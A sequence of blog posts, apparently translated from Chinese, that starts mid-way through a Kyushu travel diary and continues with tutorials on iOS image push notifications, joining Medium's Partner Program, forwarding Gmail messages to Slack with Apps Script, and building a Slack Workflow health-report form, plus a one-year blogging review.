Seats are first-come, first-served. If there are special circumstances (car sickness), please inform the guide.
Takachiho Rowing requires a reservation three days in advance, with limited slots for each time slot ⚠️
Takachiho Rowing requires a reservation three days in advance, with limited slots for each time slot ⚠️
Takachiho Rowing requires a reservation three days in advance, with limited slots for each time slot ⚠️
The rowing journey is not long, it should end in about 30-45 minutes round trip. Lunch will be finished around 12:00, the Takachiho itinerary will end around 13:20, and you will need to gather again for the return.
Three groups in our tour have reservations.
Therefore, if you want to combine a day trip with a rowing reservation, 12:00 / 12:30 would be a more suitable time. ⚠️
After lunch, you will need to walk to Takachiho Gorge. If you have a rowing reservation or feel that you cannot handle it physically, the guide will arrange a shuttle directly to save time.
It is still recommended to follow the arrangements made by KKDAY. Before making a reservation, it is advisable to inquire with the official to ensure there are no issues. ⚠️
Due to the long journey, there will be a 10-minute rest stop at a rest area for everyone to use the restroom and stretch.
Takachiho Shrine is surrounded by sacred trees, exuding a tranquil and fresh atmosphere.
Japanese Cedar, the guide mentioned in the car that if you come with family, couples, lovers, or friends, you can hold hands and walk around the tree three times for blessings.
Around 11:20 return to the gathering point and get back on the bus.
After visiting Takachiho Shrine, head to have lunch nearby.
Slippers are required, and it feels like a Japanese restaurant specifically for group tourists, but it was my first experience at a Japanese restaurant.
The overall quality of the food was average, leaning towards mediocre, possibly due to the large group resulting in most dishes being cold and the meat being average.
After lunch, follow the guide downhill to Takachiho Gorge.
After about a 20-minute walk, you can see Takachiho Gorge, and from this angle, you can see the end of the gorge (the boat stop line).
Looking back at the ancient road and the boat below from the bridge on the Takachiho side.
The boating area is just down the bridge, and the total length (to the stop line seen earlier) is about 250 meters.
There is a small park and shopping street where you can have ice cream or snacks to recharge.
After touring the bus, walk about 5 minutes to the Nishihongu of Amano Iwato Shrine, where different masks of gods are hung at the storefronts.
The guide will supplement the story of Amaterasu, the Sun Goddess, introduced on the tour bus.
To go to Amano Iwato, you need to walk a short distance. The guide will walk with everyone to Amano Iwato first, and then you can explore freely (or follow the guide back).
The Amano Iwato Cave is where Amaterasu, the Sun Goddess, once hid; the torii gate of the shrine is surrounded by stones left by worshippers.
On the way back from the visit, you will pass by an ice cream shop.
Everyone lined up for ice cream here, and also tried the local Miyazaki mango ice cream (900 yen). The guide said Miyazaki mangoes are high-quality, but honestly, Taiwanese mangoes have more mango flavor.
After a rest, slowly walk back to visit Amano Iwato Shrine.
After the last itinerary, it was already past 3 o’clock in the afternoon, and it was time to return (still a three-hour drive back to Fukuoka).
On the return journey, there will also be a stop at a rest area for everyone to use the restroom and stretch their legs.
The itinerary ends smoothly. Thank you for Ishinamu’s guidance and itinerary arrangement.👏👏👏👏👏.
For dinner, I casually bought a convenience store hot dog, the rice ball from the Tenjin Underground Street that I had a few days ago on Day 6, and the new grape-flavored Suntory drink was delicious!! I also had a BRULEE for dessert.
Good night.
The sightseeing itinerary in Kyushu is almost coming to an end, with nearly two days left for shopping and shopping.
In the morning, I went to Don Quijote (24 hr) for some simple shopping. The Tenjin Main Store is very spacious, with several floors to explore.
Visited the department store near Hakata Station around noon, bought souvenirs, Fukuoka-produced sake, Nagasaki cake from Fukusaya, Kokura Meigetsu rice crackers, and more.
Returned to the Tenjin area in the afternoon, explored Tenjin Underground Street, Le Labo, Iwataya Department Store, Mitsukoshi Department Store, and many more (lots of department stores in Tenjin).
Just ran out of Le Labo Another 13 perfume, so bought a 50ml bottle this time (around $5,800 NTD after tax refund).
Had fun twisting a cute bus stop button at C-pla in Tenjin XD
[] (https://www.youtube.com/watch?v=JwwjYSU20-c){:target=”_blank”}
It makes a sound when pressed XD.
Carrying the loot back to the hotel, had a hot dog, dessert, and a must-try in Japan! Coca-Cola!
After a rest, headed out again and arrived at Canal City Hakata at 16:30.
Mainly went to the huge gachapon store on B1.
https://gofukuoka.jp/en/spots/detail/196050
Finished shopping and headed to Hakata Station.
Around 17:30, took a bus from Hakata Station to PayPay Dome, watched a baseball game at 18:00.
Today’s match-up: Fukuoka SoftBank Hawks vs. Tokyo Yakult Swallows
Some Entry Rules Reminders : Open bags for security check, no outside food allowed, can bring a bottle of tea or water, no outside alcohol allowed, drinks and food available inside, remember to get a re-entry permit if leaving and returning.
The mascot of Fukuoka SoftBank Hawks is named Harry, had to come and support the team at the game.
Last time I sat in the more expensive infield area, this time I wanted to experience the atmosphere by sitting in the cheapest seats. I thought there were general admission seats, but it turned out to be all reserved seats, so I chose a seat on the last row on the outfield side near the edge for easy access (the chairs on this side of the outfield don’t have backs, the advantage is it’s easier to move in and out).
I can’t help but admire the sports culture in Japan. On weekdays and evenings at 18:00, the stadium has about 40,000 seats, almost full, and when selecting seats, there were no entire rows empty or seats in the corners.
The view and distance were much different compared to last time.
This time, the team was significantly behind, ending with a 9-3 defeat, no fireworks to watch, but I also witnessed the cheering activities of both teams (Fukuoka SoftBank Hawks’ balloon cheering and Tokyo Yakult Swallows’ umbrella dance cheering).
Around the 7th inning with the score already 9-1, people started leaving one after another, and I didn’t see the end either.
The bus stop was crowded as well, and just like last time, I walked back to the subway station with the crowd (about 15 minutes).
Before resting at the hotel, I deliberately took a last look at the night view of Nakasu Yatai in the alley.
Late-night snack, Nissin Donbei tofu noodles (first time trying it after so many days), fruit wine from Oita, and convenience store fried chicken (Juicy and delicious).
Unknowingly, it has been 11 days abroad, and I have started to miss Taiwanese cuisine. There is still plenty of time to wander around before the 21:00 flight.
The main souvenirs have been bought and packed, so today is just about wandering around to find the gachapon machines at the train stations (ultimately didn’t find any, referring to the list of stores provided by the manufacturer, the ones in the city were all sold out).
Early in the morning, I went to Lalaport for a stroll. (Opens at 10 am)
On the first floor, there was a cool drink cabinet converted from a Seibu bus.
The main purpose was to visit the Gachagacha Forest on the third floor and Pon! under the escalator on the first floor to see if they had the capsule toys I was looking for. (They didn’t)
Approaching 11 am and feeling hungry as I hadn’t had breakfast, I had seafood tempura rice bowl at the food street on the third floor to satisfy my hunger (found it too salty).
Then, I went back to the first floor to buy a strawberry daifuku from Rokkasen to refresh myself.
Unable to find the capsule toys I was looking for, I left Lalaport and returned to Hakata Station. Inside 1010 as well, there was no Pon! to be found.
I also couldn’t find the capsule toys area at Hakata Yodobashi.
After the unsuccessful search in Hakata, I went to the Tenjin area to look for capsule toy shops, but still no luck.
Finally giving up, I went to explore Animate and Kiddy Land upstairs (with a wide variety of character goods).
Around 4:00 pm, nearing the end of this trip, I sat at Cafe de Miki to have dessert and coffee for a break.
Around 5:00 pm, I returned to the hotel to pick up my luggage and slowly made my way to Fukuoka Airport. I thought there would be a lot of people on the subway around 5 pm, but it was not crowded at all.
It’s quite a distance from Tenjin Minami to Tenjin, and it takes about 15 minutes to walk with luggage.
Taking the airport line to Fukuoka Airport Station (domestic terminal), I then had to transfer to the airport shuttle bus (free) to the international terminal.
The airport shuttle buses run frequently, about every 5-10 minutes, with a journey of about 10 minutes. After getting off, there is still a walk to the 3F departure hall. If you include the time to get out of the subway station, it will take an additional +30 minutes to reach the international terminal.
Fukuoka Airport is currently under renovation, so it’s a bit chaotic.
I arrived at the airport too early, and the counters were not open yet. The ground staff directed us to do self-check-in at counter 1 and then self-check baggage at counter 2, where they would assist us. We quickly completed the baggage check-in (this time only 17 kg).
Around 6:30 pm, I started waiting for boarding.
The departure lounge at Fukuoka Airport is long and narrow, with a lot of people, very chaotic and crowded. (Not sure if it’s due to ongoing renovations and many flights waiting to take off).
The duty-free shops for premium and cosmetics are quite comprehensive, and the staff can speak Chinese; there are also souvenir shops (here you can find Fukusaya Nagasaki cakes); the tobacco and alcohol duty-free shop has only one store where you have to queue, and as for food, it’s even more crowded than convenience stores, so be prepared to wait in line.
A special announcement for the previous flight CI129 at 19:10: Please comply with China Airlines’ rule of carrying only one piece of carry-on luggage; if you exceed this, you will need to purchase an additional one (this flight seems fully booked).⚠️
Feeling that the area behind is too noisy and chaotic, I walked towards the north of 501-504, where there are fewer people; there is also a cafe and a fast-food restaurant where you can grab something to eat.
I bought a simple pork cutlet sandwich, a few cans of cola, and peach water to bring back to Taiwan.
Boarding started around 20:30, and there was no specific rule for checking only one piece of carry-on luggage (but I had already packed everything into one bag… ); we were ready to take off at 21:00, actually took off at 21:09, and the aircraft was an A330-300, which is relatively old.
Goodbye Kyushu, goodbye Japan. The airplane meal was ginger-flavored pork fried noodles, not very impressive, but they served cantaloupe!
Encountering turbulence throughout the flight, we landed smoothly in Taiwan after a bumpy ride, with a delay of nearly 30 minutes, arriving close to 23:00 (scheduled for 22:25).
Worried about missing public transportation, I ran all the way, missed the Airport MRT but luckily caught the shuttle bus in the end; otherwise, I would have had to take an unsafe unlicensed taxi back to Taipei.
Route 1819 , my goodness, the journey to Taipei Main Station takes about 55 minutes.
As shown in the image above, if you need to get off at a stop along the way, please inform the driver in advance when loading your luggage; otherwise, all passengers getting off at Taipei Main Station will have their luggage placed together. If you need to get off midway, you won’t be able to access your luggage.⚠️
I averaged around 20,000 steps per day, with the highest reaching 27,000 steps.
I missed capturing the box on the right, which contained shrimp crackers that I found delicious at a department store food street in Hakata Station.
This time, I added four of the Seven Lucky Gods, a mini beer, and a Kachikohsu (dog) Inu Year amulet.
The background newspaper was a gift from Le Labo.
[Japan JR PASS | Kyushu Railway Pass | North Kyushu & South Kyushu & All Kyushu | E-Ticket](https://www.kkday.com/zh-tw/product/3494-jr-kyushu-rail-pass?cid=19365&ud1=d78e0b15a08a){:target=”_blank”} |
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Image push notifications, push notification display statistics, pre-processing before push notification display
Regarding the basics of push notification setup and principles; there is a lot of information available online, so it will not be discussed here. This article focuses on how to enable the app to support image push notifications and use new features to achieve more accurate push notification display statistics.
As shown in the image above, the Notification Service Extension allows you to pre-process the push notification after the app receives it, and then display the push notification content.
The official documentation states that when we process the incoming push notification content, the processing time limit is about 30 seconds. If the callback is not made within 30 seconds, the push notification will continue to execute and appear on the user’s phone.
iOS ≥ 10.0
The structure of the backend push notification needs to add a line "mutable-content":1
for the system to execute the Notification Service Extension when it receives the push notification
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+
{
+ "aps": {
+ "alert": {
+ "title": "New article recommended for you",
+ "body": "Check it out now"
+ },
+ "mutable-content":1,
+ "sound": "default",
+ "badge": 0
+ }
+}
+
Step 1. Xcode -> File -> New -> Target
Step 2. iOS -> Notification Service Extension -> Next
Step 3. Enter Product Name -> Finish
Step 4. Click Activate
Step two, write the push notification content processing program
Find the Product Name/NotificationService.swift file
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+
import UserNotifications
+
+class NotificationService: UNNotificationServiceExtension {
+
+ var contentHandler: ((UNNotificationContent) -> Void)?
+ var bestAttemptContent: UNMutableNotificationContent?
+
+ override func didReceive(_ request: UNNotificationRequest, withContentHandler contentHandler: @escaping (UNNotificationContent) -> Void) {
+ self.contentHandler = contentHandler
+ bestAttemptContent = (request.content.mutableCopy() as? UNMutableNotificationContent)
+
+ if let bestAttemptContent = bestAttemptContent {
+ // Modify the notification content here...
+ // Process the push notification content here, load the image back
+ bestAttemptContent.title = "\(bestAttemptContent.title) [modified]"
+
+ contentHandler(bestAttemptContent)
+ }
+ }
+
+ override func serviceExtensionTimeWillExpire() {
+ // Called just before the extension will be terminated by the system.
+ // Use this as an opportunity to deliver your "best attempt" at modified content, otherwise the original push payload will be used.
+ // Time is about to expire, ignore the image, just modify the title content
+ if let contentHandler = contentHandler, let bestAttemptContent = bestAttemptContent {
+ contentHandler(bestAttemptContent)
+ }
+ }
+
+}
+
As shown in the code above, NotificationService has two interfaces; the first one is didReceive
, which is triggered when a push notification arrives. After processing, you need to call the contentHandler(bestAttemptContent)
callback method to inform the system.
If the callback method is not called within a certain time, the second function serviceExtensionTimeWillExpire()
will be triggered due to timeout. At this point, there’s not much you can do except some final touches (e.g., simply changing the title or content without loading network data).
Here we assume our payload is as follows:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+
{
+ "aps": {
+ "alert": {
+ "push_id":"2018001",
+ "title": "New Article Recommended for You",
+ "body": "Check it out now",
+ "image": "https://d2uju15hmm6f78.cloudfront.net/image/2016/12/04/3113/2018/09/28/trim_153813426461775700_450x300.jpg"
+ },
+ "mutable-content":1,
+ "sound": "default",
+ "badge": 0
+ }
+}
+
“push_id” and “image” are custom fields. The push_id is used to identify the push notification for easier tracking and reporting back to the server; the image is the URL of the image content to be attached to the push notification.
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+49
+50
+51
+52
+53
+54
+55
+56
+57
+58
+59
+60
+61
+62
+63
+64
+65
+66
+67
+
override func didReceive(_ request: UNNotificationRequest, withContentHandler contentHandler: @escaping (UNNotificationContent) -> Void) {
+ self.contentHandler = contentHandler
+ bestAttemptContent = (request.content.mutableCopy() as? UNMutableNotificationContent)
+
+ if let bestAttemptContent = bestAttemptContent {
+
+ guard let info = request.content.userInfo["aps"] as? NSDictionary, let alert = info["alert"] as? Dictionary<String, String> else {
+ contentHandler(bestAttemptContent)
+ return
+ // Push notification content format is not as expected, do not process
+ }
+
+ // Goal 2:
+ // Report to the server that the push notification has been displayed
+ if let push_id = alert["push_id"], let url = URL(string: "Display Statistics API URL") {
+ var request = URLRequest(url: url, cachePolicy: .reloadIgnoringLocalCacheData, timeoutInterval: 30)
+ request.httpMethod = "POST"
+ request.addValue(UserAgent, forHTTPHeaderField: "User-Agent")
+
+ var httpBody = "push_id=\(push_id)"
+ request.addValue("application/x-www-form-urlencoded", forHTTPHeaderField: "Content-Type")
+ request.httpBody = httpBody.data(using: .utf8)
+
+ let task = URLSession.shared.dataTask(with: request) { (data, response, error) in
+
+ }
+ DispatchQueue.global().async {
+ task.resume()
+ // Asynchronous processing, ignore it
+ }
+ }
+
+ // Goal 1:
+ guard let imageURLString = alert["image"], let imageURL = URL(string: imageURLString) else {
+ contentHandler(bestAttemptContent)
+ return
+ // If no image is attached, no special processing is needed
+ }
+
+ let dataTask = URLSession.shared.dataTask(with: imageURL) { (data, response, error) in
+ guard let fileURL = NSURL(fileURLWithPath: NSTemporaryDirectory()).appendingPathComponent(imageURL.lastPathComponent) else {
+ contentHandler(bestAttemptContent)
+ return
+ }
+ guard (try? data?.write(to: fileURL)) != nil else {
+ contentHandler(bestAttemptContent)
+ return
+ }
+
+ guard let attachment = try? UNNotificationAttachment(identifier: "image", url: fileURL, options: nil) else {
+ contentHandler(bestAttemptContent)
+ return
+ }
+ // The above reads the image link, downloads it to the phone, and creates a UNNotificationAttachment
+
+ bestAttemptContent.categoryIdentifier = "image"
+ bestAttemptContent.attachments = [attachment]
+ // Add the image attachment to the push notification
+
+ bestAttemptContent.body = (bestAttemptContent.body == "") ? ("Check it out now") : (bestAttemptContent.body)
+ // If the body is empty, use the default content "Check it out now"
+
+ contentHandler(bestAttemptContent)
+ }
+ dataTask.resume()
+ }
+}
+
serviceExtensionTimeWillExpire
part I didn’t handle specifically, so I won’t paste it; the key is still the didReceive
code mentioned above.
You can see that when a push notification is received, we first call the API to inform the backend that it has been received and will be displayed, which helps us with push notification statistics in the backend; then, if there is an attached image, we process the image.
The Notification Service Extension didReceive will still be triggered, followed by the AppDelegate’s func application( _ application: UIApplication, didReceiveRemoteNotification userInfo: [AnyHashable : Any ], fetchCompletionHandler completionHandler: @escaping (UIBackgroundFetchResult) -> Void) method.
Use Notification Content Extension to customize the UIView to be displayed when the push notification is pressed (you can create it yourself), as well as the actions upon pressing.
Refer to this article: iOS10 Advanced Push Notifications (Notification Extension)
iOS 12 and later supports more action handling: iOS 12 New Notification Features: Adding Interactivity and Implementing Complex Functions in Notifications
For the Notification Content Extension part, I only created a UIView to display image push notifications without much elaboration:
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Everyone can join the Medium Partner Program to earn revenue by writing articles.
Photo by Steve Johnson
The original intention of running Medium was not to make money but to enjoy sharing with everyone, sharing technical difficulties encountered, hoping to help developers facing the same problems take a shorter path, or based on my research, I can also learn new knowledge from it; in addition, there are few Traditional Chinese writers, hoping to inspire others and create a culture of mutual learning.
So I have always been indifferent to whether articles can make a profit. Whether there is profit or not, if there is, I can use the earnings to experiment, purchase more services or experiences, and then rewrite them into articles to share with everyone, creating a rolling cycle.
Since 2018, when I started writing articles on Medium, I knew that Medium had a Partner Program. However, in 2018, 2019, 2020… year after year, the Medium Partner Program policy has not been updated, and it has always been limited to a few regions for writers (I remember only Singapore and Japan in Asia) to join and earn; writers from regions other than those mentioned above need to go through troublesome methods to earn, such as using a VPN to access allowed regions + needing an account or phone number from that region, which I briefly researched before and found it too cumbersome and unsafe.
As a result, many creators have switched to other platforms, such as Matters, Fangzi, or self-hosted ad revenue, and in recent years, Medium has indeed lost many Chinese creators.
It wasn’t until recently in August 2024 that I accidentally saw an invitation to join the Partner Program in the banner on Medium’s backend (I thought, What? Taiwan is not open for joining again), and after clicking to see, I was surprised to find that it is now fully open, and almost all regions’ creators can join the Partner Program to earn revenue through their own articles.
But it’s a bit funny to say that before you can make money by joining the Medium Partner Program, you need to first spend money to join as a Medium Member paid subscriber (minimum $4 USD per month).
List of added countries:
Albania, Algeria, Angola, Antigua and Barbuda, Argentina, Armenia, Australia, Austria, Azerbaijan, Bahamas, Bahrain, Bangladesh, Belgium, Benin, Bhutan, Bolivia, Bosnia and Herzegovina, Botswana, Brunei, Bulgaria, Cambodia, Canada, Chile, Colombia, Costa Rica, Côte d’Ivoire, Croatia, Cyprus, Czech Republic, Denmark, Dominican Republic, Ecuador, Egypt, El Salvador, Estonia, Ethiopia, Finland, France, Gabon, Gambia, Germany, Ghana, Gibraltar, Greece, Guatemala, Guyana, Hong Kong, Hungary, India, Indonesia, Ireland, Israel, Italy, Jamaica, Japan, Jordan, Kazakhstan, Kenya, Kuwait, Laos, Latvia, Liechtenstein, Lithuania, Luxembourg, Macao, Madagascar, Malaysia, Malta, Mauritius, Mexico, Moldova, Monaco, Mongolia, Morocco, Mozambique, Namibia, Netherlands, New Zealand, Niger, Nigeria, North Macedonia, Norway, Oman, Pakistan, Panama, Paraguay, Peru, Philippines, Poland, Portugal, Qatar, Romania, Rwanda, Saint Lucia, San Marino, Saudi Arabia, Senegal, Serbia, Singapore, Slovakia, Slovenia, South Africa, South Korea, Spain, Sri Lanka, Sweden, Switzerland, Taiwan , Tanzania, Thailand, Trinidad and Tobago, Tunisia, Turkey, United Arab Emirates, United Kingdom, United States, Uruguay, Uzbekistan, and Vietnam
Recently, Medium has been adding more and more features. Another feature that was once open and then closed, the Custom Domain feature, has recently been reopened.
Return of Medium Custom Domain Feature
You can refer to my previous article “Return of Medium Custom Domain Feature” to register your own domain and bind it to Medium.
The Custom Domain feature also requires you to join as a Medium Member paid subscriber to use.
Detailed tutorials begin.
First, make sure you have a Medium Member or Medium Friend membership.
Click “Enroll now” to proceed to the next step.
Add a withdrawal account:
I used a Cathay Foreign Currency Account here, directly check the foreign currency account information in the app and fill it in. (You can change it in the settings later; it seems to verify correctness when making a transfer.)
After successful submission, you will be redirected back to Medium to continue setting up tax information.
Below is an example for a personal account with no U.S. identity.
Certification (Part III):
After submission, you will be redirected to the Payout settings page. If everything is ✅, it means you have successfully joined!
Note that joining Medium Partner does not automatically generate earnings. The article must be added to Paywall to receive revenue.
This is how this article will generate revenue.
https://medium.com/me/partner/dashboard
Medium Partner Dashboard or Story Stats will show your Earnings.
The detailed article report will also show how many paying members have viewed it.
This article was added to Paywall from the beginning (now removed), sharing the results of one month.
Earnings
Views
Reads
Read ratio
Note that only Reads (paying users staying to read for over 30 seconds) generate revenue. The allocated amount is not fixed and seems to depend on views, claps, shares, etc. My numbers are not high, so each Read is distributed around $0.01 to $0.07.
These data are for reference.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
A review of one year on Medium or a summary of 2019
In the blink of an eye, it’s been a year since I started publishing articles on Medium. The actual anniversary should be 2019/10 (first article in 2018/10); but I was too busy and uninspired at that time. As time moves forward into 2020, I quickly jot down my thoughts on managing Medium for a year, also serving as a summary of 2019!
First, I want to thank Enther Wu and Chih-Hung Yeh for pushing me to start writing again. Initially, my articles were more like daily notes or work reflections, with rather empty content. However, I shamelessly shared them on social media. Looking back at those early articles now, I feel a bit embarrassed and unsure of what I was writing, as the content wasn’t very valuable.
But everything is part of the growth process. The more I wrote, the more I got the hang of it, and the scope of my research broadened. Due to the fear of misleading others, missing details, or misunderstanding something myself, writing articles became more than just recording; it became an in-depth exploration of a particular issue, leading to my own growth and learning. Consequently, the quality of the content I shared with everyone also improved significantly.
The community is really kind-hearted. Initially, I was afraid of being criticized and losing confidence. But that didn’t happen. The feedback I received was very positive, even if the content wasn’t necessarily helpful. This positive encouragement gave me more confidence in my creations and motivated me to spend more time documenting. Thank you all for your encouragement!
The writing experience on Medium is really great. If you are also a developer, you can install Code Medium, a Chrome Extension that allows you to embed beautiful code snippets directly in Medium using Gist!
I wrote about life and technology, so to differentiate, I established two Publication channels: ZRealm Life. for sharing life and unboxing / ZRealm Dev. for sharing work and technical articles, allowing everyone to follow the content they are interested in.
A very “Western-style” thing — “LOGO”. Life needs a sense of ritual? Since it’s about managing, there should be a brand identity. So, I asked a designer to help me create my logo concept. My design idea: the pentagon frame pays homage to my alma mater NTUST’s emblem, representing craftsmanship and technology. The inner frame “ ZR “ stands for my English-translated Chinese name ZhongCheng’s initial “ Z” and Realm representing my domain’s “R”.
Speaking of gains, let’s start with the initial intention of writing — “ Teaching and Learning”. It wasn’t to show off or make money. None of my articles are behind a paywall because knowledge shouldn’t be something you have to pay to access. Knowledge is power. If you like it, please support Medium’s paid membership so we can have a long-term platform to use… (I’m really afraid it won’t withstand losses)
In terms of gains, apart from monetary benefits, I’ve gained a lot in other aspects. First is the sense of achievement. When someone reads and responds to your article, it gives you a great sense of accomplishment and more motivation to continue writing. Additionally, I’ve met many friends and had more interactions. I’m a passive socializer, and before writing articles, I was very unfamiliar with the community and had almost no interactions. Now, I’ve met many friends and feel I’m not alone on the path of development! (Just like the subtitle of my Publication — “You are not alone on the road to solving problems”).
Since this is a review, it’s customary to provide some statistics. In 2019 (including the end of 2018), a total of: 25 articles were published: 2 lifestyle + 5 unboxing + 18 technical articles Accumulated approximately 60,000 views, 5,000 claps, and surpassed 200 followers!
Thank you all for your support and love. I will continue to work hard this year!
Your follow and feedback are my motivation for writing!
ZhgChgLi, 2020/01/11.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Use Gmail Filter + Google Apps Script to automatically forward customized content to Slack Channel when receiving emails
Photo by Lukas Blazek
Recently, I have been optimizing the CI/CD process for an iOS App, using Fastlane as an automation tool. After packaging and uploading, if you want to continue with the automatic submission step ( skip_submission=false
), you need to wait for Apple to complete the process, which takes about 30-40 mins of CI Server time. Because Apple’s App Store Connect API is not perfect, Fastlane can only check once per minute if the uploaded build is processed, which is very resource-wasting.
No more waiting. End it right after uploading! Use the email notification of completion to trigger subsequent actions.
However, I haven’t received this email recently. I don’t know if it’s a setting issue or if Apple no longer sends this type of notification.
This article will use the email notification that Testflight is ready for testing as an example.
The complete process is shown in the image above. The principle is feasible; however, this is not the focus of this article. This article will focus on receiving emails and using Apps Script to forward them to a Slack Channel.
Whether it’s a paid or free Slack project, different methods can be used to achieve the function of forwarding emails to a Slack Channel or DM.
You can refer to the official documentation for setup: Send Emails to Slack
The effect is the same regardless of the method used:
Default collapsed email content, click to expand and view all content.
Advantages:
Disadvantages:
This is the main focus of this article.
Translate the email content data into the style you want to present, as shown in the example above.
Filters can automate some actions when receiving emails that meet certain conditions, such as automatically marking as read, automatically tagging, automatically moving to spam, automatically categorizing, etc.
In Gmail, click the advanced search icon button in the upper right corner, enter the forwarding email rule conditions, such as from: no_reply@email.apple.com
+ subject is is now available to test.
, click “Search” to see if the filter results are as expected; if correct, click the “Create filter” button next to Search.
Or directly click Filter message like these at the top of the email to quickly create filter conditions
This button design is very counterintuitive, it took me a while to find it the first time.
Next, set the actions for emails that meet this filter condition. Here we select “Apply the label” to create a separate new recognition label “forward-to-slack”, click “Create filter” to complete.
From then on, all emails marked with this label will be forwarded to Slack.
First, we need to add the Incoming WebHooks App to the Slack Channel, which we will use to send messages.
Select the channel where you want to send the message.
Note down the “Webhook URL” at the top
Scroll down to set the name and avatar of the bot that sends the message; remember to click “Save Settings” after making changes.
Note
Please note that the official recommendation is to use the new Slack APP Bot API’s chat.postMessage to send messages. The simple method of Incoming Webhook will be deprecated in the future. This article uses the simpler method, but it can be adjusted to the new method along with the next chapter “Import Employee List” which requires the Slack App API.
Paste the following basic script and modify it to your desired version:
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+17
+18
+19
+20
+21
+22
+23
+24
+25
+26
+27
+28
+29
+30
+31
+32
+33
+34
+35
+36
+37
+38
+39
+40
+41
+42
+43
+44
+45
+46
+47
+48
+
function sendMessageToSlack(content) {
+ var payload = {
+ "text": "*You have received an email*",
+ "attachments": [{
+ "pretext": "The email content is as follows:",
+ "text": content,
+ }
+ ]
+ };
+ var res = UrlFetchApp.fetch('Paste your Slack incoming Webhook URL here',{
+ method : 'post',
+ contentType : 'application/json',
+ payload : JSON.stringify(payload)
+ })
+}
+
+function forwardEmailsToSlack() {
+ // Referenced from: https://gist.github.com/andrewmwilson/5cab8367dc63d87d9aa5
+
+ var label = GmailApp.getUserLabelByName('forward-to-slack');
+ var messages = [];
+ var threads = label.getThreads();
+
+ if (threads == null) {
+ return;
+ }
+
+ for (var i = 0; i < threads.length; i++) {
+ messages = messages.concat(threads[i].getMessages())
+ }
+
+ for (var i = 0; i < messages.length; i++) {
+ var message = messages[i];
+ Logger.log(message);
+
+ var output = '*New Email*';
+ output += '\n*from:* ' + message.getFrom();
+ output += '\n*to:* ' + message.getTo();
+ output += '\n*cc:* ' + message.getCc();
+ output += '\n*date:* ' + message.getDate();
+ output += '\n*subject:* ' + message.getSubject();
+ output += '\n*body:* ' + message.getPlainBody();
+
+ sendMessageToSlack(output);
+ }
+
+ label.removeFromThreads(threads);
+}
+
Advanced:
Example: Extracting version number information from a Testflight approval email:
Email subject: Your app XXX has been approved for beta testing.
Email content:
We want to get the Bundle Version Short String and the value after Build Number.
1
+2
+3
+4
+5
+6
+7
+
var results = subject.match(/(Bundle Version Short String: ){1}(\S+){1}[\S\s]*(Build Number: ){1}(\S+){1}/);
+if (results == null || results.length != 5) {
+ // not valid
+} else {
+ var version = results[2];
+ var build = results[4];
+}
+
If “Authorization Required” appears, click “Continue” to complete the verification
During the authentication process, “Google hasn’t verified this app” will appear. This is normal because our App Script has not been verified by Google. However, it is fine since this is for personal use.
Click the bottom left “Advanced” -> “Go to ForwardEmailsToSlack (unsafe)”
Click “Allow”
Forwarding successful!!!
In the left menu of Apps Script, select “Triggers”.
Bottom left “+ Add Trigger”.
sendMessageToSlack
For demonstration purposes, set it to execute every minute. I think checking emails every hour is sufficient for real-time needs.
Automatic checking & forwarding successful!
With this feature, you can achieve customized email forwarding processing and even use it as a trigger. For example, automatically execute a script when receiving an XXX email.
Returning to the origin in the first chapter, we can use this mechanism to perfect the CI/CD process; no need to wait idly for Apple to complete processing, and it can be linked to the automation process!
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A new version of content is available.
Enhancing work efficiency by playing with Slack Workflow combined with Google Sheet with App Script
Photo by Stephen Phillips — Hostreviews.co.uk
In response to full remote work, the company cares about the health of all members. Every day, employees need to report their health status, which is recorded and managed by People Operations.
The above is our company’s health reporting tracking process. Each company may have different processes based on their scale and operation methods. This article uses it as an optimization example to learn Slack Workflow usage and basic App Script writing. Actual implementation should be case by case.
Having done quite a few small automation projects, this process has fixed data sources (employee list), simple conditions, and routine actions; it seemed very suitable for automation. Initially, it wasn’t done because I couldn’t find a good way to fill it out (actually, I couldn’t find an interesting research point); so it was left alone until I saw this post by Hai Zongli and realized that Slack Workflow not only can send scheduled messages but also has a form function:
Image from: Hai Zongli
This got me excited!!
If Slack Workflow Form combined with message automation can solve all the pain points mentioned above, the principle is feasible! So I started implementing it.
First, let’s look at the optimized process and results.
(Personal Estimate)
Manage the Sheet by writing App Script.
<@UID>
in the message content to tag the unfilled members.The identity verification information connecting Google Form and Slack is Email, so please ensure that all company colleagues use the company Email to fill out the Google Form, and also fill in the company Email in the Slack personal information section.
After discussing the issues, optimization methods, and results, let’s move on to the implementation phase; let’s complete this automation case step by step together.
The content is a bit lengthy, you can skip the sections you already understand, or directly create a copy from the completed result, and learn while modifying.
Completed result form: https://forms.gle/aqGDCELpAiMFFoyDA
Completed result Google Sheet:
Steps omitted, please Google if you have any questions. Here, we assume you have already created & linked the health report form.
Remember to check “Collect emails” on the form:
Collect the email addresses of the respondents for future list comparison.
How to link responses to Google Sheet?
Switch to “Responses” at the top of the form and click the “Google Sheet Icon”.
Change the linked Sheet name:
It is recommended to change the linked Sheet name from Form Responses 1 to Responses for easier use.
After having the traditional Google Form entry, let’s add the Slack filling method.
In any Slack conversation window, find the “ below the input box “ “blue lightning ⚡️” and click on it.
In the menu under “Search shortcuts,” type “workflow” and select “Open Workflow Builder.”
Here, it will list the Workflows you have created or participated in. Click “Create” in the upper right corner to create a new Workflow.
Step one, enter the workflow name (for display in the Workflow Builder interface).
